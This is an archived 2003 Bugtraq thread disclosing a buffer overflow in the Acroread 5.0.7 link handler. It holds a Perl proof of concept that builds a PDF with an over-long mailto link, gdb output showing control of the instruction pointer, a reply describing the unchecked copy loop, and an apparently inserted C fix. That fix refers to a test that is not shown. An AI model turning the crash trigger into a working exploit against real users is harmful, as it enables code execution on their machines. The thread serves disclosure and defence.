107507 2003-07-10  19:29  /132 lines/ Paul Szabo <psz@maths.usyd.edu.au>
Imported: 2003-07-10  19:29  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <5505>
Subject: Acroread 5.0.7 buffer overflow
------------------------------------------------------------
I. BACKGROUND

Acroread from http://www.adobe.com is the pre-eminent PDF file
viewer. The latest version Acroread 5.0.7 for Linux was released on
17 June 2003.

II. DESCRIPTION

Despite recent security fixes, an exploitable buffer overflow with
long URL strings remains. The overflow occurs when you click on the
link, and allows execution of arbitrary code. Acroread versions 5.0.7
and 5.0.5 were tested on Debian (woody) Linux; other acroread 5.*
versions on other UNIX platforms are expected also to be
vulnerable. (Configure Netscape as your browser, and do not have
Netscape running at the time you click.)

III. ANALYSIS

Produce a suitable test file using pdflatex e.g. with:

#!/usr/bin/perl --
#
# Demo for acroread 5.0.7 on Debian Linux
#
print '
Writing TeX file ...
';
# For acroread 5.0.5 use 248 Bs instead of 504
open P, '>attack.tex';
print P '
\documentclass[11pt]{letter}
\usepackage{times}
\usepackage[pdfpagemode=none,pdfstartview=FitH]{hyperref}
\begin{document}
   \href{mailto:X',("B"x504).("A"x4),'}
   {\texttt{mailto:X("B"x504).("A"x4)}}
\end{document}
';
close P;
#
print '
Running pdflatex ...
';
system 'pdflatex attack';
#
#!#

Acroread has a signal handler and may not crash when the link is
clicked, but gdb shows:

(gdb) run attack.pdf
Starting program: /Acroread507/Reader/intellinux/bin/acroread attack.pdf
Program received signal SIGSEGV, Segmentation fault.
(gdb) where
#0  0x40f50513 in mdNetscapeFront ()
   from /Acroread507/Reader/intellinux/plug_ins/wwwlink.api
Cannot access memory at address 0x41414141

IV. WORKAROUND

Remove the file .../Reader/*/plug_ins/wwwlink.api .

V. EXPLOIT

Censored. Fully working exploit sent to CERT.

VI. COMMENTS

Acroread 5.0.7 for Linux was released on 17 June 2003, and the README file
contains:
   New for Acrobat Reader 5.0.7
   A security patch was applied that solves the problem reported in
   CERT vulnerability 200132 whereby a weblink could execute shell
   commands.
Acroread still uses 'sh -c' via system(3) but disallows
embedded single quotes and replaces dollar($) and backquote(`) by %24
and %60 in the URL, then quotes the URL with single quotes like
  sh -c DISPLAY=DISPL BROWSER 'URL'
Seems that when given the example exploit, in a knee-jerk reaction
Adobe encoded the "special" characters used. When told that the
"shell meta-character soup" was larger, they quoted the URL and,
seeing how encoding did not work, courageously banned embedded
quotes; were too lazy to remove the encoding. Should have replaced
system(3) with fork/setenv/execv instead. The lengthening of the URL
string prompted me to check how acroread handles long replacements;
but even "plain" long strings cause it to fail.

The 5.0.7 README file also contains:
   New for Acrobat Reader 5.0.6
   A security patch was applied that solves the problem reported in
   http://online.securityfocus.com/archive/1/278984 where opening
   the font cache when the application starts up can unintentionally 
   cause the permissions of other files to change.
and confirm that this is solved in 5.0.7.

The changes from 5.0.5 to 5.0.7 are in libCoolType.so, EScript.api
and wwwlink.api only, so acroread 5.0.7 still announces itself, on
the splash screen and in Help AboutAcrobatReader, as 5.0.5. CoolType
was for 5.0.6, wwwlink for 5.0.7; is EScript for
http://www.kb.cert.org/vuls/id/184820 though that was meant to affect
"full" acrobat only?

Acroread versions 4.* do not seem vulnerable to the buffer overflow,
they chop the URL string after 1025 (!!??) bytes; but are vulnerable
to the "shell meta-character soup" (could be protected with the
workaround below).

VII. TIMELINE

13 Jun 2003  -10day advisory released
17 Jun 2003  Acroread 5.0.7 for Linux released
23 Jun 2003  iDefense and CERT alerted to buffer overflow
26 Jun 2003  Fully working exploit sent to iDefense
 1 Jul 2003  team@sec-labs.hack.pl finds same vulnerability
 9 Jul 2003  iDefense does not offer payment

VIII. REFERENCES

CERT vulnerability note
  http://www.kb.cert.org/vuls/id/200132

-10Day CERT Advisory on PDF Files (note that the workaround in the latter
message does not protect against the buffer overflow)
  http://lists.netsys.com/pipermail/full-disclosure/2003-June/010397.html
  http://lists.netsys.com/pipermail/full-disclosure/2003-June/010417.html

Adobe Acrobat Reader <=5.0.7 Buffer Overflow Vulnerability + PoC code
(public report of the same vulnerability)
  http://www.securityfocus.com/archive/1/327335
  http://www.securityfocus.com/archive/1/328472

IX. AUTHOR

Paul Szabo - psz@maths.usyd.edu.au  http://www.maths.usyd.edu.au:8000/u/psz/
School of Mathematics and Statistics  University of Sydney   2006  Australia
(107507) /Paul Szabo <psz@maths.usyd.edu.au>/(Reflowed)

107394 2003-07-09  19:47  /37 lines/ sec-labs team <team@sec-labs.hack.pl>
Imported: 2003-07-09  19:47  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <5479>
Subject: Re: [sec-labs] Adobe Acrobat Reader <=5.0.7 Buffer Overflow Vulnerability + PoC code
------------------------------------------------------------
We can easily reproduce this bug on versions 5.0.7 and 5.0.5 on
Slackware Linux with the Phoenix and Mozilla browsers. You can choose
Netscape or an NCSA compatible browser in Adobe preferences, and the
WWWLaunchNetscape and WWWLaunchNCSA functions.

You should not have a problem with this bug. It is quite simple to
reproduce. Just create a .pdf file with a long link, execute adobe, open
this file, then attach to it using gdb, put a breakpoint on
WWWLaunchNetscape and click on the link. There is a loop in this function
that does something like this:

    while(*src != '\0')
        *dst++ = *src++;

As you can see there is no bounds checking.

best regards

-- 
sec-labs team [http://sec-labs.hack.pl]
(107394) /sec-labs team <team@sec-labs.hack.pl>/(Reflowed)
Attachment (application/pgp-signature) in text 107395
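An added example, not code from either post and not Adobe's code, that puts together the two fixes this thread points at: a bounded copy in place of the unchecked `*dst++ = *src++` loop sec-labs describes, and the fork/setenv/exec launch Paul Szabo suggests instead of `system(3)` with `sh -c`. The buffer size URL_MAX, the function names and the browser argument are assumptions, not values from wwwlink.api.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

#define URL_MAX 1024 /* assumed size of the fixed URL buffer; not Adobe's real value */

/* Bounded replacement for the unchecked `*dst++ = *src++` loop: writes at
 * most cap bytes, always NUL-terminates, returns 0 if the whole URL fit
 * and -1 if it had to be truncated. */
static int copy_url_bounded(char *dst, size_t cap, const char *src)
{
    size_t n = strlen(src);
    if (cap == 0)
        return -1;
    if (n >= cap) {              /* too long: keep what fits, report it */
        memcpy(dst, src, cap - 1);
        dst[cap - 1] = '\0';
        return -1;
    }
    memcpy(dst, src, n + 1);
    return 0;
}

/* fork/setenv/exec instead of system("sh -c DISPLAY=... BROWSER 'URL'"):
 * the URL is a single argv element, so $, backquotes and quotes reach the
 * browser literally and no %24/%60 encoding or quote filtering is needed.
 * Over-long URLs are refused rather than truncated. Returns the browser's
 * exit status, or -1 on failure. */
static int launch_browser(const char *browser, const char *display, const char *url)
{
    char safe[URL_MAX];
    int status;
    pid_t pid;

    if (copy_url_bounded(safe, sizeof safe, url) != 0 || (pid = fork()) < 0)
        return -1;
    if (pid == 0) {                          /* child */
        if (display != NULL)
            setenv("DISPLAY", display, 1);
        execlp(browser, browser, safe, (char *)NULL);
        _exit(127);                          /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}
```

The test below uses `true` as the stand-in browser; in a real plug-in the browser path and display would come from the user's preferences.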

107395 2003-07-09  19:47  /8 lines/ sec-labs team <team@sec-labs.hack.pl>
Imported: 2003-07-09  19:47  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <5480>
Attachment (text/plain) to text 107394
Subject: Attachment to: Re: [sec-labs] Adobe Acrobat Reader <=5.0.7 Buffer Overflow Vulnerability + PoC code
------------------------------------------------------------
(107395) /sec-labs team <team@sec-labs.hack.pl>/----